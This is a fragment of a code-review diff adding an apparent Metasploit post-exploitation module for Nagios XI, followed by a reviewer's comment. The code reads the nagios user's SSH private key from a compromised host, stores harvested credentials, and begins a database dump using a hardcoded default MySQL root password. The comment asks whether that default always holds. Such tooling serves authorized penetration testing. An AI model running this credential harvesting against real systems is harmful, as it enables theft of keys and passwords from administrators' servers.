modules/post/linux/gather/enum_nagios_xi.rb

```diff
@@ -0,0 +1,326 @@
+            ['Nagios XI 5.2.6 <= 5.4.12', upper_version: Gem::Version.new('5.4.12'), lower_version: Gem::Version.new('5.2.6')]
+        ],
+        'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 10 },
+        'SessionTypes'   => ['shell', 'meterpreter'],
+        'DefaultTarget'  => 0
+        }
+      ))
+      register_options([
+      ])
+    end
+
+    # get file from remote host
+    def get_file(file)
+      tries = 0
+      print_status("#{@peer} - Downloading #{file}")
+
+      begin
+        buf = read_file(file)
+        buf = '' if buf =~ /No such file or directory/
+      rescue ::Timeout::Error => e
+        tries += 1
+        if tries < 3
+          vprint_error("#{@peer} - #{e.message} - retrying...")
+          retry
+        end
+        buf = ''
+      rescue EOFError => e
+        tries += 1
+        if tries < 3
+          vprint_error("#{@peer} - #{e.message} - retrying...")
+          retry
+        end
+        buf = ''
+      end
+
+      return buf
+    end
+
+    # save found creds in the MSF DB for easy use
+    def report_obj(cred, login)#, login)
+      return if cred.nil? || login.nil?
+      credential_data = {
+        origin_type: :session,
+        post_reference_name: self.fullname,
+        session_id: session_db_id,
+        workspace_id: myworkspace_id,
+
+      }.merge(cred)
+      credential_core = create_credential(credential_data)
+
+      login_data = {
+        core: credential_core,
+        workspace_id: myworkspace_id
+      }.merge(login)
+
+      create_credential_login(login_data)
+    end
+
+    #parse out domain realm for windows services
+    def parse_realm(username)
+          userealm=username.split('/')
+
+          if userealm.count>1
+            realm = userealm[0]
+            username = userealm[1]
+
+            credential_data={
+              realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+              realm_value: realm,
+              username: username
+            }
+          else
+            credential_data={
+              username: username
+            }
+
+          end
+
+      return credential_data
+    end
+
+    def run
+      @peer = "#{session.session_host}:#{session.session_port}"
+
+      @creds = []
+      @ssh_keys = []
+
+      #get nagios SSH private key
+      print_status('Attempting to grab Nagios SSH key')
+      ssh_key = get_file('/home/nagios/.ssh/id_rsa')
+
+      if ssh_key.nil?
+        print_status('No SSH key found')
+      else
+        print_good('SSH key found!') # + ssh_key)
+      end
+
+      ssh_key_loot = store_loot(
+        'nagios_ssh_priv_key',
+        'text/plain',
+        session,
+        ssh_key,
+        nil
+      )
+      print_status("Nagios SSH key stored in #{ssh_key_loot}")
+
+      print_status('Attempting to dump Nagios DB')
+      db_dump_file  = '/tmp/'
+      db_dump_file << [*('a'..'z'),*('A'..'Z')].shuffle[0,8].join.to_s
+
+      sql_query  =  %Q|mysql -u root -pnagiosxi -e "|
```

Comment:
Is the password always `nagiosxi` ?

It might be nice to make this a configurable option, or leak the password if possible.